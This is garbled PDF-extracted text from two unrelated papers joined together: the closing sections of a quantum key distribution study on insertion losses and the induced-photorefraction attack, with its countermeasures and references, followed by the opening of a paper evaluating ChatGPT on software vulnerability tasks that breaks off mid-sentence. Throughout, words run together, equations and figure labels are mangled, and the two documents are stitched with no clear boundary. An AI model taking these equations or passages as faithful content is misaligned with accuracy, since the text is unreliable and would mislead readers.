kinds of protocols. implications. Change of PM’s modulation index may be considered First, we examine protocols utilizing coherent states separately,dependingonimplementedopticaldevices. A andphase-coding. Changesinthemodulationindexlead PM can be a part of the following commonly used in the toalterationsinphase,asmostQKDsystemsemployPM field of QKD devices: withconstantphaseshiftasapartofMZIscheme. Thus, phase-remapping by a factor of x of is applicable: 1. PM with constant phase shift as a part of MZI scheme; {|α 0⟩, |α 0ei Nπ⟩, |α 0ei N2π⟩, ... , |α 0ei(2N N−1)π ⟩}→ 2. PM with oscillating phase shift, utilized in SCW →{|α⟩, |αei Nxπ⟩, |αei2 Nxπ⟩, ... , |αei(2N N−1)xπ ⟩}, (2) QKD [13, 21, 28, 49]; where α is a complex amplitude of the coherent state, 3. PM as a part of variable attenuator; 0 α is a complex amplitude after IPA with |α| ≤ |α |, 2N 0 is a total number of states in the set. After the IPA, 4. PM as a part of intensity modulator. the eavesdropper can apply additional commonly used Despite the latter classification, it is also worth men- attack, e.g. unambiguousstatediscrimination(USD)at- tioning that QKD protocol and utilized quantum states tack. TheattackischaracterizedbytheUSDprobability playessentialroleinsecurityestimations. Thus,wehigh- P U(α,x) for a given set of states. It can be found by es- light the following QKD schemes: timation of minimal eigenvalue of Gram matrix G, as in [58, 59]. Unfortunately, after the IPA Gram matrix 1. Protocols utilizing linearly dependent states (such loses essential properties, it no longer can be expressed as single-photon BB84 [50] or single-photon frac- as G → G and becomes only symmetrical one. So ij i−j tion in decoy-state protocols [12, 51, 52]), where an analytical result cannot be obtained for an arbitrary7 Figure6. Dependenciesf(x)demonstratedecreaseofunambiguousstatediscriminationprobabilityincaseofphase-remapping according to expression (2) for: (a) N =2, (b) N =3, (c) N =4 number of states. However, a few analytical observa- to prevent illumination of the modulator with a power tions can be made. We have found that the probabil- higher than a threshold. To illustrate the idea, we have ity can be expressed as P (α,x) = P (α,1)·f(x) with recreated some optical schemes [24, 30, 48] in the exper- U U 0 ≤ f(x) ≤ 1, where P (α,1) is USD probability. For iment. It was based purely on their description and was U N =1, i.e. in case of just two states as in B92, performed with optical elements available to us. We em- phasize that the obtained curves in Fig. 5 are mostly for P U(α,x)=1−e−|α|2(1−cos(πx)) (3) illustrative purposes and may vary depending on a par- ticular choice of optical components. In Fig 5 estimated and power that reaches the nearest modulator is shown: (a) 1−e−|α|2(1−cos(πx)) for the scheme from [24], (b) for the scheme from [30],
f(x)= . (4) (c) for the scheme from [48]. We compare obtained re- 1−e−2|α|2 sults with conservative mean of power needed for IPA Expressions for f(x) in case of N =2, N =3 and N =4 realization from [27, 45, 46]. are bulky, so we demonstrate dependencies of f(x) in Fig. 6. Also note, that V. DISCUSSION AND CONCLUSION 2N(|α|2)2N−1 P (α,1)≈ . (5) U (2N −1)! In this paper, we have studied spectra of insertion The overlaps of the states after the IPA only increase, so lossesofvariousfiberopticalelementssuchasopticalat- it cannot provide any significant advantage to an eaves- tenuators (see Fig. 2), WDM and isolating components dropper. (see Figs. 3 and 4, respectively) in the visible light range As for SCW QKD setup, IPA here plays the same role with wavelengths from 400 nm to 800 nm. Both the op- as attacking an IM or a VOA based on a PM in pro- tical elements and the spectral range are important for tocols with coherent states and phase-coding, since total understandingvulnerabilitiesofreal-worldQKDsystems powerofsidebandsisproportionaltomodulationindexm tohackingattacks,whoseefficiencybeingwavelengthde- (morepreciselyto1−J2(m)≈ m2,whereapproximation pendent may noticeably improve in the visible range. 0 2 is valid for small values of m and J (m) is Bessel func- Our study is motivated by one of such attacks, known 0 tion of the first kind). And the latter can be increased as the induced-photorefraction attack [27, 45, 46]. by utilizing the IPA with a recovery, as in [45], where Theopticalschemebehindourexperimentaltechnique legitimate parties recalibrate their setups after IPA. enables us to perform measurements of the insertion Countermeasure to this attack can be as follows. Be- losses with approximately 50 dB dynamic range. It is foreaconnectionofsender’ssetuptoanopticalfiberlink, simple to use and low-cost when compared with analo- it’s voltage, applied to the modulator, should be locked gous schemes discussed, e.g., in Ref. [30]. An important by either hardware or software (or both) and receiver’s point is that, by using suitably modified methods pre- setupshouldcalibrateonly. Withtheproposedapproach sentedinRef.[38],theproposedschemecanbeimproved to calibration, there is no chance that the power of pre- so as to extend both the wavelength range and the dy- paredstateswillbehigherthanitshouldbe–onlylower. namic range of measurements. As far as certification of So again, if countermeasure is applied, IPA provides no QKDsystemsisconcerned,thisisafeasibleandeasy-to- advantage to an eavesdropper. use scheme that can be employed for characterization of However, an alternative straightforward countermea- optical elements insertion losses. sure can be implemented. The phenomenon of IPA Our experimental data show that, OAs implemented requires a threshold optical power to emerge. There- into QKD systems as countermeasures against attacks fore, additionallossesmaybesimplyintroducedinorder that utilize probing pulses in the visible range require8 careful considerations. For VOAs, it turned out that, phase-remapping attack. For instance, as it is shown in at certain non-vanishing voltages, the insertion losses in Fig.6,phaseremappinginthiscaseonlydecreasechances the visible range are lower than the losses at the oper- ofunambiguousstatediscriminationandalsodoessofor ational wavelength (see Figs. 2(a)-(b)). The results for a general measurement outcome probability due to in- the absorption based FOAs (see Fig. 2(c)) indicate the crease of the overlap between states. However, IPA with transmittancewindowsthatcanbeexploitedbytheIPA recoverycanbedoneforprotocolsthatutilizedAMorIM attack. By contrast, the insertion losses of the scatter- based on PM to control the power of prepared states or ing based FOAs (see Fig. 2(d)) do not reveal noticeable wherePMitselfdefinesit,suchasinSCWQKD.Herewe changes with wavelength. So, this type of OAs is prefer- propose either locking of the sender’s voltage, applied to able as additional countermeasure against the IPA at- themodulator,soonlyreceivermaycalibratetheparam- tack. etersorintroduceadditionalinsertionlosses. Estimation The measured spectra of all the WDM-components of an amount of additional insertion losses can be done (see Fig. 3) have transmittance windows where insertion by analyzing the power that reaches the nearest inves- losses are not high enough to prevent the IPA. It is also tigated modulator in a system utilizing described above shownthattheinsertionlossesforlightpropagatingfrom technique, as it shown in Fig. 5. the com-port to the ref-port are ranged between 10 dB and 30 dB. Since this direction is used for active moni- toringpurposes,suchlossescombinedwithlowefficiency ACKNOWLEDGMENTS ofInGaAsphotodiodesinthevisiblerangewillmakethe monitoring ineffective. One way around this problem is The study is partially funded by the Ministry of Edu- to use Si-based photodiodes as the watchdog detectors cation and Science of the Russian Federation (Passport against optical probing pulses in the 400-800 nm range. No. 2019-0903). From the insertion loss spectrum shown in Fig. 4(a), the dual stage isolator delivers at least 44 dB insertion losses. Presumably, such losses can be attributed to ab- Appendix A: Beamsplitters sorptionofmagneto-opticalmaterialusedintheisolator. Similar insertion losses were measured in the circulator
for the case of backward propagation of light between In order to present the calculated insertion losses for adjacent ports. the investigated schemes in Fig. 5, we additionally have Insertionlossesforthelightpassingfromthethirdport measuredseveralbeamsplitters. Thesebeamsplittersare to the first port plotted against wavelength in Fig. 4(b) specified for 1550 nm wavelength: 50/50 beamsplitter showthatthewell-knownbroadbandfilteringscheme[60] with three connection ports, Fig. 7(a), 50/50 beamsplit- based on a Bragg grating connected to the second port terwithfourconnectionports,Fig.7(b),onepolarization of the circulator becomes ineffective in the 400-506 nm beamsplitter with three ports, Fig. 7(c), and one 99/1 range. Thus, it cannot be employed as a reliable tool to with four ports, Fig. 7(d). counter the IPA. Tosimplifytheperceptionofthefigures,onlytheback- We summarize with the remark that the scattering ward propagations as the insertion losses are presented, based FOA characterized by nearly wavelength indepen- since they have a minor difference for both the forward dent losses and utilized in combination with a couple of and the backward propagation. Here we define forward the isolating components will deliver at least 100 dB in- connection as the propagation of scanning light from a sertionlosses, whichisenoughtocountersuccessfulreal- portwithalowernumbertoaportwithahighernumber, ization of the IPA. andbackwardconnectionasitsopposite,forinstance,see Security issues for various types of protocols with ap- the box in Fig. 7. propriate countermeasures if necessary were considered For each beamsplitter, splitting ratios differ from the as well. We did not cover protocols with a set of lin- one of working wavelength, with an exception for the early dependent states, since there are a number of pa- 99/1 beamsplitter. This may be useful for an eavesdrop- pers dedicated to investigate the problem. However, we per in the case when legitimate users have not measured have considered protocols with a set of linearly indepen- insertion losses for beamsplitters within the considered dentstates, suchascoherentstateswithphase-codingor rangeandhaveeventuallychosenlowervalues. However, SCW QKD protocol. Unlike the first type of protocols, on the other hand, it may also be used as an additional the second ones are not vulnerable to IPA followed by countermeasure to attenuate injected light. [1] V. Scarani, H. Bechmann-Pasquinucci, N. J. Cerf, [2] N.Gisin,G.Ribordy,W.Tittel,andH.Zbinden,Quan- M. Dušek, N. Lütkenhaus, and M. Peev, The security tum cryptography, Rev. Mod. Phys. 74, 145 (2002). of practical quantum key distribution, Rev. Mod. Phys. [3] R.Renner,N.Gisin,andB.Kraus,Information-theoretic 81, 1301 (2009). security proof for quantum-key-distribution protocols,9 (a) l (nm) (c) )Bd( sessol noitresnI 25 (b) 20 15 10 5 0 400 500 600 700 800 l (nm) (d) (e) (f) )Bd( sessol noitresnI 400 500 600 700 800 l (nm) )Bd( sessol noitresnI 400 500 600 700 800 l (nm) )Bd( sessol noitresnI 20 2-1 4-1 3-1 4-2 15 3-1 3-2 10 5 0 40 40 2-1 4-1 3-1 4-2 30 30 3-1 3-2 20 20 10 10 0 0 400 500 600 700 800 Port 2 Port 1 Port 4 Port 1 Port 3 Port 2 Port 3 Figure 7. Insertion losses measured in the 400-800 nm range for: (a) 50/50 three-port beamsplitter, (b) 50/50 four-ports beamsplitter, (c) three-port polarization beamsplitter, (d) 99/1 four-port beamsplitter, (e) and (f) illustrate ports numeration of beamsplitters Physical Review A 72, 012332 (2005). distribution, Physical review letters 94, 230504 (2005). [4] C. Portmann and R. Renner, Cryptographic secu- [13] A. Gaidash, G. Miroshnichenko, and A. Kozubov, Sub- rity of quantum key distribution, arXiv preprint carrier wave quantum key distribution with leaky and arXiv:1409.3525 (2014). flawed devices, JOSA B 39, 577 (2022). [5] P.W.ShorandJ.Preskill,Simpleproofofsecurityofthe [14] C.-h. F. Fung, K. Tamaki, B. Qi, H.-K. Lo, and X. Ma, bb84quantumkeydistributionprotocol,Physicalreview Security proof of quantum key distribution with detec- letters 85, 441 (2000). tionefficiencymismatch,arXivpreprintarXiv:0802.3788 [6] M.Christandl,R.Renner,andA.Ekert,Agenericsecu- (2008). rity proof for quantum key distribution, arXiv preprint [15] Y.Zhang,P.J.Coles,A.Winick,J.Lin,andN.Lütken- quant-ph/0402131 (2004). haus, Security proof of practical quantum key distribu- [7] H. Inamori, N. Lütkenhaus, and D. Mayers, Uncondi- tionwithdetection-efficiencymismatch,PhysicalReview tionalsecurityofpracticalquantumkeydistribution,The Research 3, 013076 (2021). European Physical Journal D 41, 599 (2007). [16] M. Bochkov and A. Trushechkin, Security of quantum [8] M. Ben-Or, M. Horodecki, D. W. Leung, D. Mayers, keydistributionwithdetection-efficiencymismatchinthe and J. Oppenheim, The universal composable security single-photoncase: Tightbounds,PhysicalReviewA99, ofquantumkeydistribution,inTheory of Cryptography: 032308 (2019). Second Theory of Cryptography Conference, TCC 2005, [17] U. Vazirani and T. Vidick, Fully device independent Cambridge, MA, USA, February 10-12, 2005. Proceed- quantum key distribution, Communications of the ACM
ings 2 (Springer, 2005) pp. 386–406. 62, 133 (2019). [9] A. Leverrier, R. García-Patrón, R. Renner, and N. J. [18] V. Zapatero, T. van Leent, R. Arnon-Friedman, W.-Z. Cerf, Security of continuous-variable quantum key dis- Liu,Q.Zhang,H.Weinfurter,andM.Curty,Advancesin tributionagainstgeneralattacks,Physicalreviewletters device-independentquantumkeydistribution,npjquan- 110, 030502 (2013). tum information 9, 10 (2023). [10] M.Curty,T.Moroder,X.Ma,H.-K.Lo,andN.Lütken- [19] R.Arnon-Friedman,F.Dupuis,O.Fawzi,R.Renner,and haus,Upperboundsforthesecurekeyrateofthedecoy- T. Vidick, Practical device-independent quantum cryp- state quantum key distribution, Physical Review A 79, tography via entropy accumulation, Nature communica- 032335 (2009). tions 9, 459 (2018). [11] D.Gottesman,H.-K.Lo,N.Lutkenhaus,andJ.Preskill, [20] R. Arnon-Friedman, R. Renner, and T. Vidick, Sim- Security of quantum key distribution with imperfect de- ple and tight device-independent security proofs, SIAM vices, in International Symposium onInformation The- Journal on Computing 48, 181 (2019). ory, 2004. ISIT 2004. Proceedings. (IEEE, 2004) p. 136. [21] V. Chistiakov, A. Kozubov, A. Gaidash, A. Gleim, and [12] H.-K.Lo,X.Ma,andK.Chen,Decoystatequantumkey G.Miroshnichenko,Feasibilityoftwin-fieldquantumkey10 distribution based on multi-mode coherent phase-coded ponents: Prospects for Trojan-horse attacks, Physical states, Optics Express 27, 36551 (2019). Review Applied 20, 014038 (2023). [22] H.-K. Lo, M. Curty, and B. Qi, Measurement-device- [38] I. S. Sushchev, D. M. Guzairova, A. N. Klimov, independent quantum key distribution, Physical review D. A. Dvoretskiy, S. A. Bogdanov, K. D. Bondar, and letters 108, 130503 (2012). A. P. Naumenko, Practical security analysis against the [23] S. L. Braunstein and S. Pirandola, Side-channel-free Trojan-horse attacks on fiber-based phase-coding QKD quantum key distribution, Physical review letters 108, system in the wide spectral range, in Emerging Imaging 130502 (2012). and Sensing Technologies for Security and Defence VI, [24] M. Lucamarini, I. Choi, M. B. Ward, J. F. Dynes, Vol. 11868 (SPIE, 2021) pp. 57–63. Z. Yuan, and A. J. Shields, Practical security bounds [39] N. Jain, B. Stiller, I. Khan, V. Makarov, C. Marquardt, againstthetrojan-horseattackinquantumkeydistribu- and G. Leuchs, Risk analysis of Trojan-horse attacks on tion, Physical Review X 5, 031030 (2015). practical quantum key distribution systems, IEEE Jour- [25] S. Pirandola, R. Laurenza, C. Ottaviani, and L. Banchi, nal of Selected Topics in Quantum Electronics 21, 168 Fundamentallimitsofrepeaterlessquantumcommunica- (2014). tions, Nature communications 8, 1 (2017). [40] B. Nasedkin, I. Filipov, A. Ismagilov, V. Chistiakov, [26] A. Acín, N. Brunner, N. Gisin, S. Massar, S. Pironio, F.Kiselev,A.Tsypkin,andV.Egorov,Analyzingtrans- andV.Scarani,Device-independentsecurityofquantum mission spectra of fiber-optic elements in the near ir cryptographyagainstcollectiveattacks,Phys.Rev.Lett. range to improve the security of quantum key distribu- 98, 230501 (2007). tion systems, Bulletin of the Russian Academy of Sci- [27] F.-Y. Lu, P. Ye, Z.-H. Wang, S. Wang, Z.-Q. Yin, ences: Physics 86, 1164 (2022). R. Wang, X.-J. Huang, W. Chen, D.-Y. He, G.-J. Fan- [41] S.Alferov,K.Bugai,andI.Pargachev,Studyofthevul- Yuan, et al., Hacking measurement-device-independent nerability of neutral optical filters used in quantum key quantum key distribution, Optica 10, 520 (2023). distribution systems against laser damage attack, JETP [28] S. Sajeed, P. Chaiwongkhot, A. Huang, H. Qin, Letters 116, 123 (2022). V. Egorov, A. Kozubov, A. Gaidash, V. Chistiakov, [42] A. Huang, R. Li, V. Egorov, S. Tchouragoulov, K. Ku- A. Vasiliev, A. Gleim, et al., An approach for security mar, and V. Makarov, Laser-damage attack against op- evaluationandcertificationofacompletequantumcom- tical attenuators in quantum key distribution, Physical munication system, Scientific Reports 11, 5110 (2021). Review Applied 13, 034017 (2020). [29] S. Sun and A. Huang, A review of security evaluation of [43] A. Ponosova, D. Ruzhitskaya, P. Chaiwongkhot, practical quantum key distribution system, Entropy 24, V.Egorov,V.Makarov,andA.Huang,Protectingfiber- 260 (2022). optic quantum key distribution sources against light- [30] V. Makarov, A. Abrikosov, P. Chaiwongkhot, A. K. Fe- injection attacks, PRX Quantum 3, 040307 (2022). dorov, A. Huang, E. Kiktenko, M. Petrov, A. Ponosova, [44] P.Chaiwongkhot,J.Zhong,A.Huang,H.Qin,S.-c.Shi, D.Ruzhitskaya,A.Tayduganov,etal.,Preparingacom- andV.Makarov,Fakingphotonnumberonatransition-
mercial quantum key distribution system for certifica- edge sensor, EPJ Quantum Technology 9, 23 (2022). tion against implementation loopholes, arXiv preprint [45] L.Han,Y.Li,H.Tan,W.Zhang,W.Cai,J.Yin,J.Ren, arXiv:2310.20107 (2023). F. Xu, S. Liao, and C. Peng, Effect of light injection [31] A.Vakhitov,V.Makarov,andD.R.Hjelme,Largepulse on the security of practical quantum key distribution, attackasamethodofconventionalopticaleavesdropping Physical Review Applied 20, 044013 (2023). in quantum cryptography, Journal of modern optics 48, [46] P. Ye, W. Chen, G.-W. Zhang, F.-Y. Lu, F.-X. Wang, 2023 (2001). G.-Z. Huang, S. Wang, D.-Y. He, Z.-Q. Yin, G.-C. Guo, [32] N. Gisin, S. Fasel, B. Kraus, H. Zbinden, and G. Ri- et al., Induced-photorefraction attack against quantum bordy,Trojan-horseattacksonquantum-key-distribution key distribution, Physical Review Applied 19, 054052 systems, Physical Review A 73, 022320 (2006). (2023). [33] V. Makarov, Controlling passively quenched single pho- [47] P.-f. Gu and Z.-r. Zheng, Design of non-polarizing tondetectorsbybrightlight,NewJournalofPhysics11, thin film edge filters, Journal of Zhejiang University- 065003 (2009). SCIENCE A 7, 1037 (2006). [34] V. Chistiakov, A. Huang, V. Egorov, and V. Makarov, [48] A. A. Hajomer, I. Derkach, N. Jain, H.-M. Chin, U. L. Controlling single-photon detector id210 with bright Andersen, and T. Gehring, Long-distance continuous- light, Optics express 27, 32253 (2019). variable quantum key distribution over 100-km fiber [35] B. Gao, Z. Wu, W. Shi, Y. Liu, D. Wang, C. Yu, withlocallocaloscillator,ScienceAdvances10,eadi9474 A.Huang,andJ.Wu,Abilityofstrong-pulseillumination (2024). to hack self-differencing avalanche photodiode detectors [49] G. Miroshnichenko, A. Kozubov, A. Gaidash, A. Gleim, in a high-speed quantum-key-distribution system, Phys- and D. Horoshko, Security of subcarrier wave quantum ical Review A 106, 033713 (2022). key distribution against the collective beam-splitting at- [36] A. Borisova, B. Garmaev, I. Bobrov, S. Negodyaev, tack, Optics express 26, 11292 (2018). and I. Sinil’shchikov, Risk analysis of countermeasures [50] C. H. Bennett and G. Brassard, Quantum cryptogra- against the trojan-horse attacks on quantum key distri- phy: Public key distribution and coin tossing, Theoreti- bution systems in 1260–1650 nm spectral range, Optics cal computer science 560, 7 (2014). and Spectroscopy 128, 1892 (2020). [51] X. Ma, B. Qi, Y. Zhao, and H.-K. Lo, Practical de- [37] B. Nasedkin, F. Kiselev, I. Filipov, D. Tolochko, coy state for quantum key distribution, Physical Review A. Ismagilov, V. Chistiakov, A. Gaidash, A. Tcyp- A—Atomic, Molecular, and Optical Physics 72, 012326 kin, A. Kozubov, and V. Egorov, Loopholes in the (2005). 1500–2100-nm range for quantum-key-distribution com- [52] X.-B.Wang,Beatingthephoton-number-splittingattack11 in practical quantum cryptography, Physical review let- of cryptology 5, 3 (1992). ters 94, 230503 (2005). [57] C. Gobby, a. Yuan, and A. Shields, Quantum key distri- [53] C.-H. F. Fung, B. Qi, K. Tamaki, and H.-K. Lo, Phase- bution over 122 km of standard telecom fiber, Applied remapping attack in practical quantum-key-distribution Physics Letters 84, 3762 (2004). systems, Physical Review A—Atomic, Molecular, and [58] A.Kozubov,A.Gaidash,andG.Miroshnichenko,Quan- Optical Physics 75, 032314 (2007). tumcontrolattack: Towardsjointestimationofprotocol [54] C. H. Bennett, Quantum cryptography using any two andhardwareloopholes,PhysicalReviewA104,022603 nonorthogonal states, Physical review letters 68, 3121 (2021). (1992). [59] A.Gaidash,A.Kozubov,andG.Miroshnichenko,Meth- [55] H.-K. Lo and J. Preskill, Security of quantum key dis- ods of decreasing the unambiguous state discrimination tribution using weak coherent states with nonrandom probabilityforsubcarrierwavequantumkeydistribution phases, arXiv preprint quant-ph/0610203 (2006). systems, JOSA B 36, B16 (2019). [56] C. H. Bennett, F. Bessette, G. Brassard, L. Salvail, and [60] I.Riant,Fiberbragggratingsforopticaltelecommunica- J.Smolin,Experimentalquantumcryptography,Journal tions, Comptes Rendus Physique 4, 41 (2003).
2404.03994 Pros and Cons! Evaluating ChatGPT on Software Vulnerability XINYIN,ZhejiangUniversity,China ThispaperproposesapipelineforquantitativelyevaluatinginteractiveLLMssuchasChatGPTusingpublicly availabledataset.WecarryoutanextensivetechnicalevaluationofChatGPTusingBig-Vulcoveringfive differentcommonsoftwarevulnerabilitytasks.WeevaluatethemultitaskandmultilingualaspectsofChatGPT basedonthisdataset.Wefoundthattheexistingstate-of-the-artmethodsaregenerallysuperiortoChatGPTin softwarevulnerabilitydetection.AlthoughChatGPTimprovesaccuracywhenprovidingcontextinformation, itstillhaslimitationsinaccuratelypredictingseverityratingsforcertainCWEtypes.Inaddition,ChatGPT demonstratessomeabilityinlocatingvulnerabilitiesforcertainCWEtypes,butitsperformancevariesamong differentCWEtypes.ChatGPTexhibitslimitedvulnerabilityrepaircapabilitiesinbothprovidingandnot providingcontextinformation.Finally,ChatGPTshowsunevenperformanceingeneratingCVEdescriptions forvariousCWEtypes,withlimitedaccuracyindetailedinformation.Overall,thoughChatGPTperforms wellinsomeaspects,itstillneedsimprovementinunderstandingthesubtledifferencesincodevulnerabilities andtheabilitytodescribevulnerabilitiesinordertofullyrealizeitspotential.Ourevaluationframework providesvaluableinsightsforfurtherenhancingChatGPT’ssoftwarevulnerabilityhandlingcapabilities. 1 INTRODUCTION SoftwareVulnerabilities(SVs)canexposesoftwaresystemstorisksituationsandeventually causes huge economic losses or even threatens people’s lives. Therefore, completing software vulnerabilities is an important task for software quality assurance (SQA). Generally, there are manyimportantsoftwarequalityactivitiesforsoftwarevulnerabilitiessuchasSVdetection,SV assessment,SVlocation,SVrepair,andSVdescriptiongeneration.Therelationshipamongthe SQAactivitiescanbeillustratedinFig.1. RQ-2 Vulnerability Assessment Source Vulnerability Vulnerability Vulnerability Vulnerability Source Code Detection Location Repair Description Code RQ-1 RQ-3 RQ-4 RQ-5 Fig.1. Therelationshipamongsoftwarevulnerabilityactivities. Meanwhile,ChatGPThasbecomeawell-knownAImodelforgeneralpublicusersincluding userswhoarenotfamiliarwithLLMsorcomputersciencetechnology.ItisdevelopedbyOpenAI andtechnicallybuiltonGPT-3.5architecture[4].ThemostimportantreasonwhyChatGPThas becomesopopularisthatChatGPThastheabilitytocoverinnumerableusecasesforbothacademic andnon-academicusersonline.Besides,somediscussionsareconductedaboutwhetherChatGPT isapproachingArtificialGeneralIntelligence(AGI)sinceithastheabilitytoaddressmanytypesof taskswithoutspecificfine-tune[20,21].Therestillhavesomedebatesconcerningitsfailuresina fewsimpletasks[12,19,48]. Inthispaper,wefocusonevaluatingChatGPT’sperformanceinvarioussoftwarevulnerability (SV)-relatedtasksinazero-shotsettingtoobtainabasic,comprehensive,andbetterunderstanding ofitsmulti-taskability,andweaimtoanswerthefollowingresearchquestions. Author’saddress:XinYin,ZhejiangUniversity,Hangzhou,Zhejiang,China,xyin@zju.edu.cn. ,Vol.1,No.1,Article.Publicationdate:April2024. 4202 rpA 5 ]ES.sc[ 1v49930.4042:viXra2 XinYin • RQ-1:HowdoesChatGPTperformonvulnerabilitydetection?SoftwareVulnerabilities (SVs)canexposesoftwaresystemstorisksituationsandconsequentlysoftwarefunctionfailure. Therefore,detectingtheseSVsisanimportanttaskforsoftwarequalityassurance.Wewantto exploretheabilityofChatGPTonvulnerabilitydetectionaswellastheperformancedifference comparedwithstate-of-the-artapproaches. • RQ-2:HowdoesChatGPTperformonvulnerabilityassessment?Inpractice,duetothe limitationofSQAresources[28],itisimpossibletotreatalldetectedSVsequallyandfixallSVs simultaneously.Thus,itisnecessarytoprioritizethesedetectedsoftwarevulnerabilitiesforbetter treatment.AneffectivesolutiontoprioritizethoseSVs,whichhasimminentandseriousthreats tothesystemsofinterest,istouseoneofthemostwidelyknownSVassessmentframework CVSS(CommonVulnerabilityScoringSystem)[29],whichcharacterizesSVsbyconsidering three metric groups: Base, Temporal and Environmental. The metrics that are in the groups canbefurtherusedasthecriterionforselectingseriousSVstofixearly.Therefore,wewantto exploretheabilityofChatGPTonassessingvulnerabilities. • RQ-3: How does ChatGPT perform on vulnerability location? Identifying the precise locationofvulnerabilitiesinsoftwaresystemsisofcriticalimportanceformitigatingrisksand improvingsoftwarequality.Thevulnerabilitylocationtaskinvolvespinpointingtheseweaknesses accuratelyandhelpstonarrowthescopefordeveloperstofixproblems.Therefore,weaimto investigateChatGPT’scapabilityineffectivelyidentifyingthepreciselocationofvulnerabilities insoftwaresystems. • RQ-4:HowdoesChatGPTperformonvulnerabilityrepair?Addressingvulnerabilitiesin softwaresystemsiscrucialforriskmitigationandsoftwarequalityenhancement.Vulnerability repair task requires effective identification and remediation of these flaws with source code andconsequentlyhelpstoimprovethedevelopmentefficiency.WewanttoexamineChatGPT’s proficiencyinefficientlyrepairingvulnerabilitiesinsoftwaresystems.
• RQ-5: How does ChatGPT perform on vulnerability description generation? Under- standingtheintricaciesofvulnerabilitiesinsoftwaresystemsplaysapivotalroleinalleviating risksandbolsteringsoftwarequality.Thevulnerabilitydescriptiontaskfocusesonconveyinga detailedexplanationoftheseidentifiedissuesinthesourcecodesandhelpsparticipantstobetter understandtheriskaswellasitsimpacts.OuraimistoassessChatGPT’scapacitytoeffectively generatethedescriptionofvulnerabilitieswithinsoftwaresystems. Besides, to extensively and comprehensively analyze the model’s ability, we use large-scale datasetcontainingreal-worldprojectvulnerabilities(namedBig-Vul).Then,wecarefullydesign experimentstodiscoverthefindingsbyansweringfiveRQs.Eventually,themaincontributionof ourworkissummarizedasfollowsandtakeawayfindingsareshowninTable1. • WeextensivelyevaluatetheperformanceofChatGPTondifferentsoftwarevulnerabilitytasksand conductanextensivecomparisonamongChatGPTandlearning-basedapproachesonsoftware vulnerability. • WedesignfiveRQstocomprehensivelyunderstandChatGPTfromdifferentdimensions,and supportedourconclusionswitheffectiveresultsandexamples. • Wereleaseourreproductionpackageforfurtherstudy[2]. 2 BACKGROUNDANDRELATEDWORK 2.1 LargeLanguageModel SincetheadvancementsinNaturalLanguageProcessing,LargeLanguageModels(LLMs)[6] have seen widespread adoption due to their capacity to be effectively trained with billions of parametersandtrainingsamples,resultinginsignificantperformanceenhancements.LLMscan ,Vol.1,No.1,Article.Publicationdate:April2024.ProsandCons!EvaluatingChatGPTonSoftwareVulnerability 3 Table1. InsightsandTakeaways:EvaluatingChatGPTonSoftwareVulnerability Dimension FindingsorInsights 1.Theexistingstate-of-the-artapproachesperformbetterthanChatGPT. VulnerabilityDetection 2.ChatGPTexcelsatnullpointerandaccesscontrolvulnerabilitiesbutstruggleswithothers. 3.ChatGPTiseasilyswayedtochangevulnerabilityclassifications,indicatinglowconfidence. 4.ChatGPThasthelimitedcapacityforassessmentofvulnerability,butcanbeimprovedwithmorecontext. VulnerabilityAssessment 5.ChatGPT’sinconsistentvulnerabilityseveritypredictionacrossCWEshighlightsneededenhancements. 6.ChatGPT’svulnerabilityseveritypredictionimproveswithkeyinfo,butvariesbyCWEtype. VulnerabilityLocalization 7.ChatGPTexhibitsacertaincapabilityinvulnerabilitylocationsanditsperformancevariesamongdifferentCWEtypes. VulnerabilityRepair 8.ChatGPThaslimitedabilityinrepairingvulnerabilitynomatterwhenprovidedwithcontextinformationornot. 9.ChatGPT’sperformanceinrepairingcanbeattributedtoitsabilitytorecognizeandunderstandspecificvulnerabilitypatterns. VulnerabilityDescription 10.ChatGPThasunevenCVEdescriptiongenerationacrossCWEs,withlimiteddetailaccuracy. 11.ChatGPThasunevenvulnerabilitydescriptionabilityduetotrainingdata,complexity,andlanguagespecificity. readilybeappliedtodownstreamtasksthrougheitherfine-tuning[46]orprompting[37].Their versatilitystemsfrombeingtrainedtopossessabroadunderstanding,enablingthemtocapture diverseknowledgeacrossvariousdomains.Fine-tuninginvolvesupdatingthemodelparameters specificallyforagivendownstreamtaskthroughiterativetrainingonaspecificdataset.Incontrast, promptingallowsfordirectutilizationbyprovidingnaturallanguagedescriptionsorafewexamples ofthedownstreamtask.Comparedtoprompting,fine-tuningisresource-intensiveasitnecessitates additionalmodeltrainingandisapplicableinlimitedscenarios,particularlywhenadequatetraining datasetsareunavailable. LLMs are usually built on the transformer architecture [53] and can be classified into three typesofarchitectures:encoder-only,encoder-decoder,anddecoder-only.Encoder-only(e.g.,Code- BERT[16],GraphCodeBERT[23],andUniXcoder[22])andEncoder-Decoder(e.g.,PLBART[3] andCodeT5[54])modelsaretrainedusingMaskedLanguageModeling(MLM)orMaskedSpan Prediction(MSP)objective,respectively,whereasmallportion(e.g.,15%)ofthetokensarereplaced witheithermaskedtokensormaskedspantokensLLMsaretrainedtorecoverthemaskedtokens. Thesemodelsaretrainedasgeneralonesonthecode-relateddataandthenarefine-tunedfor thedownstreamtaskstoachievesuperiorperformance.Decoder-onlymodelsalsoattractasmall portionofpeople’sattentionandtheyaretrainedbyusingCausalLanguageModelingobjectives topredicttheprobabilityofthenexttokengivenallprevioustokens.GPT[46]anditsvariantsare themostrepresentativemodels,whichbringthelargelanguagemodelsintopracticalusage. Recently,theChatGPTmodelattractsthewidestattentionfromtheworld,whichisthesuccessor of the large language model InstructGPT [44] with a dialog interface that is fine-tuned using theReinforcementLearningwithHumanFeedback(RLHF)approach[13,44,61].RLHFinitially fine-tunesthebasemodelusingasmalldatasetofpromptsasinputandthedesiredoutput,typically human-written,torefineitsperformance.Subsequently,arewardmodelistrainedonalargersetof promptsbysamplingoutputsgeneratedbythefine-tunedmodel.Theseoutputsarethenreordered byhumanlabelerstoprovidefeedbackfortrainingtherewardmodel.Reinforcementlearning[47] isthenusedtocalculaterewardsforeachoutputgeneratedbasedontherewardmodel,updating LLMparametersaccordingly.Withfine-tuningandalignmentwithhumanpreferences,LLMsbetter
